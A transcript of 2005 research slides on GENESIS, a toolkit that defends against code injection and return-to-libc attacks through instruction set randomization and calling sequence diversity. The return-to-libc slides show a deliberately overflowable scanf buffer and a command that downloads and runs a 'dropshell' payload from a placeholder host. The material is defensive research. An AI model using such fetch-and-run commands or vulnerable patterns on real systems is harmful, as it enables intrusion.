G E N E S I S : A Framework For Achieving Component Diversity

GENESIS: A Framework For Achieving Component Diversity. John C. Knight, Jack W. Davidson, David Evans, Anh Nguyen-Tuong (University of Virginia); Chenxi Wang (Carnegie Mellon University)


Transcript of G E N E S I S : A Framework For Achieving Component Diversity

Page 1: G E N E S I S : A Framework For Achieving Component Diversity

GENESIS: A Framework For Achieving Component Diversity

John C. Knight, Jack W. Davidson, David Evans, Anh Nguyen-Tuong
University of Virginia

Chenxi Wang
Carnegie Mellon University

Page 2: G E N E S I S : A Framework For Achieving Component Diversity

University of Virginia www.cs.virginia.edu/genesis

DARPA SRS July 2005 PI Meeting 2

Project Overview

Existing practice: Monoculture

Technical objectives: Exploit artificial diversity to break existing software monoculture

Technical approach: Artificial diversity at compile, link, load, and execution times

Combinations selectable with toolkit

[Figure: pipeline diagram. Labels: Source Code, Object Code, Executable; Compile, Link, Load, Run; Diversity Transforms.]

Page 3: G E N E S I S : A Framework For Achieving Component Diversity


Project Overview

Major risks and planned mitigation:
    Susceptibility to new class of attacks
    Deployment issues
    Ad hoc evaluation

Quantitative metrics:
    Fraction of variants that remain susceptible to attack after transformation

Expected major achievements:
    Significant reduction in susceptibility

Task milestones (schedule 12/31/05):
    Complete diversity toolkit
    Evaluate complete spectrum of diversity techniques

Page 4: G E N E S I S : A Framework For Achieving Component Diversity


Genesis Diversity Toolkit

[Figure: toolkit architecture. Labels: Diversity Specification; Genesis Diversity Generator; Source Files; Front End (lcc), Front End (Phoenix), Front End (EDG); Diversity Generator; Backend (VPO); Linker (Diablo); RTLs; Object Files; Runtime Libraries; Strata Libraries; FE CSD, SSR, AES/XOR, IT, CSD; Application Variants; Genesis Execution Environment; Server Farm.]

Page 5: G E N E S I S : A Framework For Achieving Component Diversity


Genesis Diversity Generator

[Figure: diversity generator pipeline. Labels: Diversity Specification; Source Files; Front End (lcc), Front End (Phoenix), Front End (EDG); Diversity Generator; Backend (VPO); Linker (Diablo); RTLs; Object Files; Executable; Runtime Libraries; Strata Libraries; FE CSD, SSR, AES/XOR, IT, CSD.]

Page 6: G E N E S I S : A Framework For Achieving Component Diversity


Page 7: G E N E S I S : A Framework For Achieving Component Diversity


Strong ISR using AES and IT

Randomized Instruction Set Emulation, E. G. Barrantes, D. H. Ackley, S. Forrest, and D. Stefanović, ACM Transactions on Information System Security, 8(1), pp. 3-40.

Current implementations of ISR execute injected code:
    Random instruction sequences are executed
    Rely on probabilistic arguments that the random sequences will crash harmlessly
    Not realistic for critical embedded systems
    Recovery of application is difficult/impossible

Vulnerable to attack:
    Where's the FEEB?, Ana Sovarel and Dave Evans, USENIX Security Conference, August 2005.

Overhead issues (both space and time)

Page 8: G E N E S I S : A Framework For Achieving Component Diversity


Strong ISR using AES and IT

F:  inst1
    inst2
    inst3
    bne L1
    inst5
L1: inst6
    ...

Diablo tags and pads instructions

Diablo encrypts with AES

[Figure: three views of memory at addresses 0x40 to 0x50: the original instruction bytes, the instructions after tagging and nop padding, and the AES-encrypted bytes. Labels: Address, 128-bit block, tag.]

Page 9: G E N E S I S : A Framework For Achieving Component Diversity


Strong ISR using AES and IT

[Figure: link-time and run-time flow. Link time: Diablo, with inputs labelled Application binary modules (M1.o, M2.o), Runtime libraries modules (glibc.a, crt0.o) and Secure key, and output labelled Encrypted Application. Run time: Strata Virtual Machine with stages Context Capture, Cached?, New Fragment, Fetch, Decode, Translate, Next PC, Finished?, Context Switch, New PC, and a Decrypt Engine.]

Decrypt Engine: Decrypt block and check tag. If tag invalid, do not execute fragment.

Page 10: G E N E S I S : A Framework For Achieving Component Diversity


CSD: Calling sequence diversity

Compile-time/runtime technique to create a software population with many different calling sequences

Effective defense against "return-to-libc" attacks (also known as arc injection; Pincus and Baker, IEEE Security and Privacy, 2(4), pp. 20-27)
    Return-to-libc does not require injecting code into the application
    ISR is not an effective defense against return-to-libc type attacks

Page 11: G E N E S I S : A Framework For Achieving Component Diversity


Return-to-libc attack

void bar(int arg1, int arg2) {
    char buffer[100];
    …
    scanf("%s", buffer);
    …
}

[Figure: runtime stack before the overflow (…, arg2, arg1, return addr, saved ebp, buffer) and after the buffer overflow (…, arg2, bad arg, system, saved ebp, buffer).]

wget: http://www.example.com/dropshell ;chmod +x dropshell ; ./dropshell

Page 12: G E N E S I S : A Framework For Achieving Component Diversity


CSD: Calling sequence diversity

void bar() {
    …
    key = Keygen(key, &bar, &foo);
    foo(arg1, arg2);
    key = Keygen(key, &foo, &bar);
    …
    key = Keygen(key, &bar, &baz);
    baz(arg);
    key = Keygen(key, &baz, &bar);
    …
}

void foo(int a1, int a2) {
    Keycheck(key);
    …
    Keycheck(key);
}

Page 13: G E N E S I S : A Framework For Achieving Component Diversity


CSD: Calling sequence diversity

Calls to Keygen and Keycheck routines are inserted by the compiler front end (lcc, edg, Phoenix)

At runtime:
    Strata generates a key for each function (stored in protected region)
    Replaces calls with inline code to generate proper key or check that the key has the proper value
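A minimal simulation of the key chaining shown on the CSD slides, added here as an illustration; it is not the Genesis or Strata code. The function ids, the XOR-based Keygen, the two-argument Keycheck and the xorshift key generator are assumptions made for the sketch.

```c
#include <stdint.h>
#include <stdio.h>
enum { FN_BAR, FN_FOO, FN_COUNT };       /* ids stand in for &bar, &foo (assumption) */
static uint32_t fn_key[FN_COUNT];        /* per-function keys (Strata: protected region) */
static uint32_t key;                     /* running key for the current call sequence */
static int violations;                   /* failed checks recorded by Keycheck */

/* Constructed stand-in for per-variant key generation (xorshift32). */
static void init_variant(uint32_t seed) {
    uint32_t x = seed ? seed : 1;
    for (int i = 0; i < FN_COUNT; i++) {
        x ^= x << 13; x ^= x >> 17; x ^= x << 5;
        fn_key[i] = x;
    }
    key = fn_key[FN_BAR];                /* execution starts in bar */
    violations = 0;
}

/* Only a transfer that starts with key == fn_key[from] ends with key == fn_key[to]. */
static uint32_t Keygen(uint32_t k, int from, int to) {
    return k ^ fn_key[from] ^ fn_key[to];
}

static int Keycheck(uint32_t k, int self) {
    if (k == fn_key[self]) return 1;
    violations++;                        /* response policy is outside this sketch */
    return 0;
}

static int foo(int a1, int a2) {
    if (!Keycheck(key, FN_FOO)) return -1;   /* check on entry */
    int r = a1 + a2;
    if (!Keycheck(key, FN_FOO)) return -1;   /* check before return */
    return r;
}

static int bar_calls_foo(int a1, int a2) {   /* instrumented call site from the slide */
    key = Keygen(key, FN_BAR, FN_FOO);
    int r = foo(a1, a2);
    key = Keygen(key, FN_FOO, FN_BAR);
    return r;
}

/* Control arrives in foo without running the call-site Keygen. */
static int enter_foo_directly(int a1, int a2) { return foo(a1, a2); }

int main(void) {
    init_variant(0x2005);
    int ok = bar_calls_foo(2, 3), bad = enter_foo_directly(2, 3);
    printf("instrumented call: %d, direct entry: %d\n", ok, bad);
    return 0;
}
```

Re-running init_variant with a different seed gives every function a different key, which is what makes a key value observed in one variant useless against another.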

Page 14: G E N E S I S : A Framework For Achieving Component Diversity


Return-to-libc attack

void bad(int arg1, int arg2) {
    char buffer[100];
    …
    scanf("%s", buffer);
    …
}

[Figure: runtime stack before the overflow (…, arg2, arg1, return addr, saved ebp, buffer) and after the buffer overflow (…, arg2, bad arg, system, saved ebp, buffer).]

wget: http://www.example.com/dropshell ;chmod +x dropshell ; ./dropshell

Page 15: G E N E S I S : A Framework For Achieving Component Diversity


Genesis Diversity Toolkit

[Figure: toolkit architecture. Labels: Diversity Specification; Genesis Diversity Generator; Source Files; Front End (lcc), Front End (Phoenix), Front End (EDG); Diversity Generator; Backend (VPO); Linker (Diablo); RTLs; Object Files; Runtime Libraries; Strata Libraries; FE CSD, SSR, AES/XOR, IT, CSD; Application Variants; Genesis Execution Environment; Server Farm.]

Page 16: G E N E S I S : A Framework For Achieving Component Diversity


Toolkit Execution Environment

[Figure: execution environment. Labels: Diversity Specification; Application Variants; Genesis Execution Environment; Server Farm; Application Variants from Diversity Generator.]

Page 17: G E N E S I S : A Framework For Achieving Component Diversity


Page 18: G E N E S I S : A Framework For Achieving Component Diversity


Performance

Apache Performance (w/fast returns, w/IBTC)

[Figure: bar chart. Y axis: Slowdown, 0 to 1.4. X axis: Configuration, with labels of the form csd=0.prefix=0.aes=0.xor=0.ssr=0 running through csd=1.prefix=1.aes=1.xor=0.ssr=64, plus "no strata". Series: No Checking, Checking.]

Page 19: G E N E S I S : A Framework For Achieving Component Diversity


Progress Towards Metric

Diversity toolkit facilitates:
    Creation of large number of variants
    Operating, attacking & monitoring variants

Large numbers of variants of Apache created and tested, success rate very high

Disclaimers:
    Only one application
    Synthetic but realistic vulnerabilities
    No statistical significance